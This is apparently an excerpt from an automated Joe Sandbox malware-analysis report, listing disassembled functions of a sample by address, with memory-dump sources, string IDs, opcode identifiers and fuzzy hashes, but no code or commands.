                                                                                                                                                                                                                                                                          • String ID: c$
                                                                                                                                                                                                                                                                          • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                          • Opcode ID: 3e7173b7f35150ce67f14e4cf7677baf70ca03931a29a373c7b3ea58a15b4991
                                                                                                                                                                                                                                                                          • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e7173b7f35150ce67f14e4cf7677baf70ca03931a29a373c7b3ea58a15b4991
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                                          Function 00439830 Relevance: 1.9, Strings: 1, Instructions: 681COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-1993550816
                                                                                                                                                                                                                                                                          • Opcode ID: 5a2b71fe6b7abe8913033312b3adb200dd37ce9910002ae41400eab354b8cdfc
                                                                                                                                                                                                                                                                          • Instruction ID: c6061003a35e321c419c30bd02a3c4e1c0b56f4f8cbc670ef9e4360bbe252bef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2b71fe6b7abe8913033312b3adb200dd37ce9910002ae41400eab354b8cdfc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7722EF756083518FD718CF25C880A2BBBE2BBC9314F199A2DE4D587391DBB4EC06CB46
                                                                                                                                                                                                                                                                          Function 024C9A97 Relevance: 1.9, Strings: 1, Instructions: 681COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                                                                          • API String ID: 0-1993550816
                                                                                                                                                                                                                                                                          • Opcode ID: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                                          • Instruction ID: 4219466cffb1b245e999101c07fd13b92c2e63b957af67180792dbcb473d4680
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9822F2796083519FD754CF29C880B2BBBE2BBC9718F288A2DE5D597391DB70D805CB42
                                                                                                                                                                                                                                                                          Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: A67H
                                                                                                                                                                                                                                                                          • API String ID: 0-3389657328
                                                                                                                                                                                                                                                                          • Opcode ID: 025ab6247b28a9282489cbf8863c1f11cc422bce5e661f3cde5867652b65232c
                                                                                                                                                                                                                                                                          • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 025ab6247b28a9282489cbf8863c1f11cc422bce5e661f3cde5867652b65232c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                                                          Function 024A8F35 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: [
                                                                                                                                                                                                                                                                          • API String ID: 0-3878419350
                                                                                                                                                                                                                                                                          • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                          • Instruction ID: 3ba1abbb005ae7d47fef9b25955e9e631f09e9f174ff1680e564550c5f84974b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD020075600702CBCB24CF29C8E1663B7F2FFA9714B19859DC4864FBA5EB39A452CB50
                                                                                                                                                                                                                                                                          Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ,)*k
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-1228391949
                                                                                                                                                                                                                                                                          • Opcode ID: 3abeb72b50cbf0ea3c5cb2ec33269c319db1e6da438ada41a467feb5054111f7
                                                                                                                                                                                                                                                                          • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3abeb72b50cbf0ea3c5cb2ec33269c319db1e6da438ada41a467feb5054111f7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                                                                                                                                                                          Function 024C6E67 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ,)*k
                                                                                                                                                                                                                                                                          • API String ID: 0-1228391949
                                                                                                                                                                                                                                                                          • Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                                          • Instruction ID: 9832939cc0ca6e4005c5657630c66589d1309634df904c298b50862bafd67e39
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04C1687DA083105BD364DF29C880A3FFBEAABC6714F29992EE58157780D7319C40CB82
                                                                                                                                                                                                                                                                          Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: m
                                                                                                                                                                                                                                                                          • API String ID: 0-3775001192
                                                                                                                                                                                                                                                                          • Opcode ID: 6ef6d805ebeae707db88c870f1bf3431cf214446e2165707fa793f0aed11e90b
                                                                                                                                                                                                                                                                          • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ef6d805ebeae707db88c870f1bf3431cf214446e2165707fa793f0aed11e90b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                                                          Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: 167H
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                                          • Opcode ID: 47f0214db84f49b5bfad94cac133fa0217f1a5aa21233c84e6ce32df6523bf1a
                                                                                                                                                                                                                                                                          • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47f0214db84f49b5bfad94cac133fa0217f1a5aa21233c84e6ce32df6523bf1a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                                          Function 024B5BF7 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 167H
                                                                                                                                                                                                                                                                          • API String ID: 0-2704650348
                                                                                                                                                                                                                                                                          • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                          • Instruction ID: 68ed794287213f62c57d89f4b2042641088a8b9800cd6093fe2dc976d33dd27b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD18772A043444BDB15CF298C816EBF792EFC5314F59862EE985873C0D775C906CBA2
                                                                                                                                                                                                                                                                          Function 024AC921 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                          • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                          • Instruction ID: 81f36312a2ed6ba89055a7637830084efded24017588a7aed2dcd3164ab5f086
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72C105B5D01212CBCB24CF29C8917BBB7B1FF95314F19825ED896AB790E734A941CB90
                                                                                                                                                                                                                                                                          Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                          • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                          • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                                          Function 00428BE9 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                                                                                                                                                          • Opcode ID: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                                          • Instruction ID: 0c29c4f326a3360d4f83cd19facfb249d1e6e8dcfa8d7f8eb9091c930c4cf0c7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69D17634B05254CFDB14CF78E8D16AEBBB2AF1A310F6841BDE5519B392CB384906CB59
                                                                                                                                                                                                                                                                          Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &#
                                                                                                                                                                                                                                                                          • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                          • Opcode ID: de53aefd5a1aa7a3c6e7ceeff6aeff0c51e7fefa1ef74132f5b7c443d7941a72
                                                                                                                                                                                                                                                                          • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de53aefd5a1aa7a3c6e7ceeff6aeff0c51e7fefa1ef74132f5b7c443d7941a72
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                                          Function 024B1F77 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &#
                                                                                                                                                                                                                                                                          • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                          • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                          • Instruction ID: 96b86d7540c5f77ace728f7c69143a4dcb02229961cbb447936c71c566bc1532
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81A14C71A042105BDB1ADF28CC526BB73E5EF91324F09852EED96DB390E3B4D905C762
                                                                                                                                                                                                                                                                          Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                          • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                          • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                                                          Function 024983C7 Relevance: 1.6, Strings: 1, Instructions: 399COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                                                                                                          • API String ID: 0-2547889144
                                                                                                                                                                                                                                                                          • Opcode ID: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
                                                                                                                                                                                                                                                                          • Instruction ID: 9ab1ffac1155baa116eee1a4e09dc656cf79e2e31ea32e76bff985f9d1b7f6db
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CD1FC31A087454BCB18CE2DC89026FBFD3AFC2624F188A5EE4E6473D5D7399945CB81
                                                                                                                                                                                                                                                                          Function 00409700 Relevance: 1.6, Strings: 1, Instructions: 351COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • F1177B6615FB90FCF9F1B7136A1E0C5E, xrefs: 004097D3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: F1177B6615FB90FCF9F1B7136A1E0C5E
                                                                                                                                                                                                                                                                          • API String ID: 0-2392879585
                                                                                                                                                                                                                                                                          • Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                                                                                                                                                                                                                                          • Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56
                                                                                                                                                                                                                                                                          Function 024AC528 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: de
                                                                                                                                                                                                                                                                          • API String ID: 0-2106599819
                                                                                                                                                                                                                                                                          • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                          • Instruction ID: 237539fc1c8f80e61523eba48e1ed7785010906efede98e614aae4835ec7f1bb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53912271908311CAC324DF68C8E266BB7F2EFA1324F18992EE4D64B391E7788505C792
                                                                                                                                                                                                                                                                          Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ~
                                                                                                                                                                                                                                                                          • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                          • Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                          • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                                                                                                                                                                          Function 024AD4D7 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
